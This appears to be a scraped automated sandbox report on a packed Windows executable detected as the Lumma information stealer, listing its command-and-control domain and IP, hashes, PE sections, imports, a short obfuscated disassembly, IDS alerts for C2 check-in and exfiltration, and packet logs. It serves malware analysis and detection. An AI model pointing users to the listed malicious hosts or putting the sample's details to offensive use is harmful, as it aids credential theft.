                                                                                                      https://hypothesizys.click/ADfile.exe, 00000000.00000003.1886520757.0000000001AAC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1890362595.0000000001AAC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        https://hypothesizys.click/iD#=file.exe, 00000000.00000003.1886520757.0000000001AAC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1890362595.0000000001AAC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000000.00000003.1782165046.00000000040EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000000.00000003.1733556183.000000000400E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733634374.000000000400C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733729616.000000000400C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://hypothesizys.click/ofile.exe, 00000000.00000003.1709540938.0000000001A4B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94file.exe, 00000000.00000003.1782499822.0000000003FCB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  • No. of IPs < 25%
                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                  • 75% < No. of IPs
                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                  104.21.95.235
                                                                                                                  hypothesizys.clickUnited States
                                                                                                                  13335CLOUDFLARENETUStrue
                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                  Analysis ID:1579894
                                                                                                                  Start date and time:2024-12-23 14:27:07 +01:00
                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                  Overall analysis duration:0h 4m 21s
                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                  Report type:full
                                                                                                                  Cookbook file name:default.jbs
                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                  Number of analysed new started processes analysed:4
                                                                                                                  Number of new started drivers analysed:0
                                                                                                                  Number of existing processes analysed:0
                                                                                                                  Number of existing drivers analysed:0
                                                                                                                  Number of injected processes analysed:0
                                                                                                                  Technologies:
                                                                                                                  • HCA enabled
                                                                                                                  • EGA enabled
                                                                                                                  • AMSI enabled
                                                                                                                  Analysis Mode:default
                                                                                                                  Analysis stop reason:Timeout
                                                                                                                  Sample name:file.exe
                                                                                                                  Detection:MAL
                                                                                                                  Classification:mal100.troj.spyw.evad.winEXE@1/0@1/1
                                                                                                                  EGA Information:Failed
                                                                                                                  HCA Information:
                                                                                                                  • Successful, ratio: 100%
                                                                                                                  • Number of executed functions: 0
                                                                                                                  • Number of non-executed functions: 1
                                                                                                                  Cookbook Comments:
                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                  • Stop behavior analysis, all processes terminated
                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                                                                  • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63
                                                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                  • Execution Graph export aborted for target file.exe, PID 6956 because there are no executed function
                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                  • VT rate limit hit for: file.exe
                                                                                                                  TimeTypeDescription
                                                                                                                  08:28:02API Interceptor8x Sleep call for process: file.exe modified
                                                                                                                  No context
                                                                                                                  No context
                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  CLOUDFLARENETUSfile.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • 104.21.40.196
                                                                                                                  https://mandrillapp.com/track/click/30903880/lamp.avocet.io?p=eyJzIjoiM2NCLS1TMlk4RWF3Nl9vVXV4SHlzRDZ5dmJJIiwidiI6MSwicCI6IntcInVcIjozMDkwMzg4MCxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2xhbXAuYXZvY2V0LmlvXFxcL25ldy11c2VyXCIsXCJpZFwiOlwiMTMxMTQyZmQwMzMxNDA4MWE0YmQyOGYzZDRmYmViYzRcIixcInVybF9pZHNcIjpbXCI0OWFlZTViODJkYzk4NGYxNTg2ZGIzZTYzNGE5ZWUxMDgxYjVmMDY5XCJdfSJ9Get hashmaliciousUnknownBrowse
                                                                                                                  • 104.18.16.155
                                                                                                                  https://laimilano.powerappsportals.com/Get hashmaliciousUnknownBrowse
                                                                                                                  • 104.21.22.164
                                                                                                                  Order_12232024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                  • 172.67.177.134
                                                                                                                  acronis recovery expert deluxe 1.0.0.132.rarl.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 104.21.35.89
                                                                                                                  rTTSWIFTCOPIES.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                  • 172.67.177.134
                                                                                                                  https://www.google.com.au/url?q=//www.google.co.nz/amp/s/synthchromal.ru/Vc51/Get hashmaliciousUnknownBrowse
                                                                                                                  • 172.67.154.63
                                                                                                                  https://a41c415c7bccad129d61b50d2032009e.aktive-senioren.biz/de/st/1?#bqcnl4tocgzq65tck3bvGet hashmaliciousUnknownBrowse
                                                                                                                  • 104.21.92.223
                                                                                                                  FBmz85HS0d.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 172.67.150.173
                                                                                                                  armv5l.elfGet hashmaliciousUnknownBrowse
                                                                                                                  • 1.8.230.191
                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  a0e9f5d64349fb13191bc781f81f42e1acronis recovery expert deluxe 1.0.0.132.rarl.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 104.21.95.235
                                                                                                                  FBmz85HS0d.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 104.21.95.235
                                                                                                                  BJQizQ6sqT.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 104.21.95.235
                                                                                                                  2ZsJ2iP8Q2.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 104.21.95.235
                                                                                                                  LopCYSStr3.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 104.21.95.235
                                                                                                                  LNn56KMkEE.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 104.21.95.235
                                                                                                                  VBHyEN96Pw.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 104.21.95.235
                                                                                                                  BVGvbpplT8.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                  • 104.21.95.235
                                                                                                                  613vKYuY2S.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 104.21.95.235
                                                                                                                  FBVmDbz2nb.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                  • 104.21.95.235
                                                                                                                  No context
                                                                                                                  No created / dropped files found
                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Entropy (8bit):7.873161625297609
                                                                                                                  TrID:
                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                  File name:file.exe
                                                                                                                  File size:5'784'576 bytes
                                                                                                                  MD5:d41882715738e10a16d164da8514aa5a
                                                                                                                  SHA1:3d4a8721cc0d10f276cd462447a579901a42c0f4
                                                                                                                  SHA256:7a7868522449e85d36886dd0e2108bb4652f71addc7b28d0a0cec2c1c5eaa2a8
                                                                                                                  SHA512:030fb9dd5fbcff633a2be8a7b7d730374f56748c4083a0ebd101dcd4f1b68e4b7d46f3467ae946c0b1b92758deed445156a5ddc107dc0815099cb867a8ab0f84
                                                                                                                  SSDEEP:98304:YKs/TcBpRunOXHRuXVOU2XJmwYsR8S9+OEDpqqQm/fgBDDqC+kjF9j9SRVLxcnIV:YhrcdunOXHRQm6O3HOov+ohYVLxwlQ
                                                                                                                  TLSH:7A462386A9C203B0E5B557B463A2F83D7A393C758B30CCCF64AA7649AC772455732B13
                                                                                                                  File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g.....................p......i.............@..........................0.......hX...@........................................
                                                                                                                  Icon Hash:121c5a5ad8d85b1e
                                                                                                                  Entrypoint:0xc9dc69
                                                                                                                  Entrypoint Section:.vmp
                                                                                                                  Digitally signed:false
                                                                                                                  Imagebase:0x400000
                                                                                                                  Subsystem:windows gui
                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                  Time Stamp:0x675F3CD1 [Sun Dec 15 20:32:17 2024 UTC]
                                                                                                                  TLS Callbacks:
                                                                                                                  CLR (.Net) Version:
                                                                                                                  OS Version Major:6
                                                                                                                  OS Version Minor:0
                                                                                                                  File Version Major:6
                                                                                                                  File Version Minor:0
                                                                                                                  Subsystem Version Major:6
                                                                                                                  Subsystem Version Minor:0
                                                                                                                  Import Hash:0823da187b10a80c7472d0ab7e5f5b95
                                                                                                                  Instruction
                                                                                                                  push esi
                                                                                                                  pushfd
                                                                                                                  mov esi, 3B00681Eh
                                                                                                                  call 00007F2C654A8FECh
                                                                                                                  push D00F30ABh
                                                                                                                  call 00007F2C654A7EDEh
                                                                                                                  add ebp, 00000002h
                                                                                                                  call 00007F2C654A62BFh
                                                                                                                  mov ecx, F4867A1Eh
                                                                                                                  jmp 00007F2C65460601h
                                                                                                                  mov dword ptr [esp+eax-0000898Ah], eax
                                                                                                                  neg cl
                                                                                                                  xor word ptr [esp+eax-00008988h], dx
                                                                                                                  mov dword ptr [esp+edx-33AA890Ah], edx
                                                                                                                  or dword ptr [esp+eax-0000898Ah], eax
                                                                                                                  adc cl, FFFFFF9Eh
                                                                                                                  mul dx
                                                                                                                  sbb edx, 4D1828AAh
                                                                                                                  shr edx, 64h
                                                                                                                  ror cl, 1
                                                                                                                  xor bl, cl
                                                                                                                  rol byte ptr [esp+edx*2-1CD2441Dh], 00000025h
                                                                                                                  mul word ptr [esp+edx*2-1CD2441Dh]
                                                                                                                  neg dword ptr [esp+edx-0E692627h]
                                                                                                                  mov dword ptr [esp+edx*2-1CD24C4Eh], esi
                                                                                                                  ror dl, FFFFFFA3h
                                                                                                                  push ebx
                                                                                                                  adc edx, edx
                                                                                                                  mul eax
                                                                                                                  call 00007F2C65429AACh
                                                                                                                  mov dword ptr [edi+00h], eax
                                                                                                                  lea esp, dword ptr [esp+10h]
                                                                                                                  jmp 00007F2C65557E74h
                                                                                                                  mov edx, 50FFF195h
                                                                                                                  leave
                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x8ffdd00xa0.vmp
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x9880000x4a3c2.rsrc
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x9830000x4214.reloc
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x8390000x1d4.vmp
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                  0x10000x3eb360x20c00069e57f0971e32bb6e32f18d690252afFalse0.9988519799618321data7.976313830582199IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                  0x400000x20970xe007a0d90d4d96aa4010d21aa66d44031c6False0.9963727678571429data7.887970092560811IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  0x430000xe1e40x3000e62c43f5d17b3d123d7685837c574125False0.9742024739583334data7.887990741002275IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                  0x520000x5d00x600cde6188a7d622da30e60a16a8cf9568eFalse1.0071614583333333data7.741263846996405IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                  0x530000x38880x2200da939aac5143a3526139112c1e0ca8b4False0.9789751838235294data7.892930629560054IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  .vmp0x570000x6c32a0x6c400cf231f93f11fb79990faac8d1d65442fFalse0.9861815278579676data7.971623593122607IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  .idata0xc40000x10000x200593c06e005b608d840b8feef7f910b95False0.615234375data4.81673112860289IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                  .themida0xc50000x41a0000x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                  .boot0x4df0000x222a000x222a0032be3bab1eb7da4cb7a23977afae46ceunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                  .vmp0x7020000x1369f40x136a004f392048d64c60e39b0d8d553f1893cfFalse0.9031737298792757data7.78426522776504IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                  .vmp0x8390000x3780x400da95cf89b655794571a1b1794450098fFalse0.431640625data3.094037777083467IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                  .vmp0x83a0000x1487100x1488007abf4dd0e5966445a9c1cea6781332b4False0.966277379423516data7.883575468586369IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                  .reloc0x9830000x42140x44009a57772549da8f381c699227b2555a61False0.35920266544117646data6.122357000297735IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  .rsrc0x9880000x4a3c20x4a40068da23bf4a176b1878bf0d14994a914cFalse0.5728541929713805data6.406270839476479IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                  MUI0x9882cc0x58b5InnoSetup messages, version 5.5.3, 221 messages (UTF-16), &About Setup...0.1815579726099784
                                                                                                                  RT_ICON0x98db840x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.6425891181988743
                                                                                                                  RT_ICON0x98ec2c0x4228Device independent bitmap graphic, 64 x 128 x 32, image size 163840.4661667453944261
                                                                                                                  RT_ICON0x992e540x10828Device independent bitmap graphic, 128 x 256 x 32, image size 655360.3631403052170827
                                                                                                                  RT_ICON0x9a367c0xdf61PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9968698085162193
                                                                                                                  RT_ICON0x9b15e00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096EnglishUnited States0.6271106941838649
                                                                                                                  RT_ICON0x9b26880x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384EnglishUnited States0.4517595654227681
                                                                                                                  RT_ICON0x9b68b00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536EnglishUnited States0.3177570093457944
                                                                                                                  RT_ICON0x9c70d80xaddbPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9969218325207271
                                                                                                                  RT_GROUP_ICON0x9d1eb40x3edata0.8225806451612904
                                                                                                                  RT_GROUP_ICON0x9d1ef40x3edataEnglishUnited States0.8709677419354839
                                                                                                                  RT_MANIFEST0x9d1f340x48eXML 1.0 document, ASCII text0.43310463121783876
                                                                                                                  DLLImport
                                                                                                                  kernel32.dllGetModuleHandleA
                                                                                                                  SHELL32.dllSHEmptyRecycleBinW
                                                                                                                  USER32.dllCloseClipboard
                                                                                                                  GDI32.dllBitBlt
                                                                                                                  ole32.dllCoCreateInstance
                                                                                                                  OLEAUT32.dllSysAllocString
                                                                                                                  kernel32.dllGetSystemTimeAsFileTime, CreateEventA, GetModuleHandleA, TerminateProcess, GetCurrentProcess, CreateToolhelp32Snapshot, Thread32First, GetCurrentProcessId, GetCurrentThreadId, OpenThread, Thread32Next, CloseHandle, SuspendThread, ResumeThread, WriteProcessMemory, GetSystemInfo, VirtualAlloc, VirtualProtect, VirtualFree, GetProcessAffinityMask, SetProcessAffinityMask, GetCurrentThread, SetThreadAffinityMask, Sleep, LoadLibraryA, FreeLibrary, GetTickCount, SystemTimeToFileTime, FileTimeToSystemTime, GlobalFree, HeapAlloc, HeapFree, GetProcAddress, ExitProcess, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSection, DeleteCriticalSection, MultiByteToWideChar, GetModuleHandleW, LoadResource, FindResourceExW, FindResourceExA, WideCharToMultiByte, GetThreadLocale, GetUserDefaultLCID, GetSystemDefaultLCID, EnumResourceNamesA, EnumResourceNamesW, EnumResourceLanguagesA, EnumResourceLanguagesW, EnumResourceTypesA, EnumResourceTypesW, CreateFileW, LoadLibraryW, GetLastError, GetCommandLineA, GetCPInfo, InterlockedIncrement, InterlockedDecrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RaiseException, LCMapStringA, LCMapStringW, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, HeapCreate, HeapDestroy, QueryPerformanceCounter, HeapReAlloc, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, HeapSize, WriteFile, RtlUnwind, SetFilePointer, GetConsoleCP, GetConsoleMode, InitializeCriticalSectionAndSpinCount, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA, FlushFileBuffers, VirtualQuery
                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                  EnglishUnited States
                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                  2024-12-23T14:28:02.082617+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449730104.21.95.235443TCP
                                                                                                                  2024-12-23T14:28:02.901923+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449730104.21.95.235443TCP
                                                                                                                  2024-12-23T14:28:02.901923+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449730104.21.95.235443TCP
                                                                                                                  2024-12-23T14:28:04.136873+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449731104.21.95.235443TCP
                                                                                                                  2024-12-23T14:28:04.994718+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449731104.21.95.235443TCP
                                                                                                                  2024-12-23T14:28:04.994718+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449731104.21.95.235443TCP
                                                                                                                  2024-12-23T14:28:06.625353+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449732104.21.95.235443TCP
                                                                                                                  2024-12-23T14:28:08.953034+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449733104.21.95.235443TCP
                                                                                                                  2024-12-23T14:28:11.426844+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449734104.21.95.235443TCP
                                                                                                                  2024-12-23T14:28:14.259015+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449735104.21.95.235443TCP
                                                                                                                  2024-12-23T14:28:15.017424+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449735104.21.95.235443TCP
                                                                                                                  2024-12-23T14:28:16.716616+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449736104.21.95.235443TCP
                                                                                                                  2024-12-23T14:28:20.522470+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449740104.21.95.235443TCP
                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Dec 23, 2024 14:28:00.863284111 CET49730443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:00.863353968 CET44349730104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:00.863476038 CET49730443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:00.866189957 CET49730443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:00.866209030 CET44349730104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:02.082542896 CET44349730104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:02.082617044 CET49730443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:02.087527037 CET49730443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:02.087553024 CET44349730104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:02.087754011 CET44349730104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:02.131419897 CET49730443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:02.173983097 CET49730443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:02.174009085 CET49730443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:02.174071074 CET44349730104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:02.901895046 CET44349730104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:02.901962996 CET44349730104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:02.902137041 CET49730443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:02.904069901 CET49730443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:02.904094934 CET44349730104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:02.921546936 CET49731443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:02.921572924 CET44349731104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:02.921658039 CET49731443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:02.922013998 CET49731443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:02.922025919 CET44349731104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:04.136774063 CET44349731104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:04.136873007 CET49731443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:04.143419027 CET49731443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:04.143424988 CET44349731104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:04.143621922 CET44349731104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:04.193969011 CET49731443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:04.242264032 CET49731443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:04.242305040 CET49731443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:04.242336035 CET44349731104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:04.994651079 CET44349731104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:04.994688988 CET44349731104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:04.994718075 CET44349731104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:04.994745016 CET44349731104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:04.994752884 CET49731443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:04.994764090 CET44349731104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:04.994802952 CET49731443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:04.994807959 CET44349731104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:04.994853973 CET49731443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:04.994859934 CET44349731104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:05.002624989 CET44349731104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:05.002707958 CET49731443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:05.002715111 CET44349731104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:05.011357069 CET44349731104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:05.011424065 CET49731443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:05.011430025 CET44349731104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:05.053473949 CET49731443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:05.053478956 CET44349731104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:05.100317955 CET49731443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:05.114340067 CET44349731104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:05.162796021 CET49731443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:05.186235905 CET44349731104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:05.189989090 CET44349731104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:05.190064907 CET44349731104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:05.190202951 CET49731443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:05.190202951 CET49731443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:05.190349102 CET49731443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:05.190357924 CET44349731104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:05.190381050 CET49731443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:05.190386057 CET44349731104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:05.406461954 CET49732443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:05.406487942 CET44349732104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:05.406569958 CET49732443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:05.406970978 CET49732443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:05.406985044 CET44349732104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:06.625241995 CET44349732104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:06.625353098 CET49732443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:06.635178089 CET49732443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:06.635186911 CET44349732104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:06.635519028 CET44349732104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:06.636468887 CET49732443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:06.636590958 CET49732443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:06.636624098 CET44349732104.21.95.235192.168.2.4
                                                                                                                  Dec 23, 2024 14:28:06.636693954 CET49732443192.168.2.4104.21.95.235
                                                                                                                  Dec 23, 2024 14:28:06.636701107 CET44349732104.21.95.235192.168.2.4
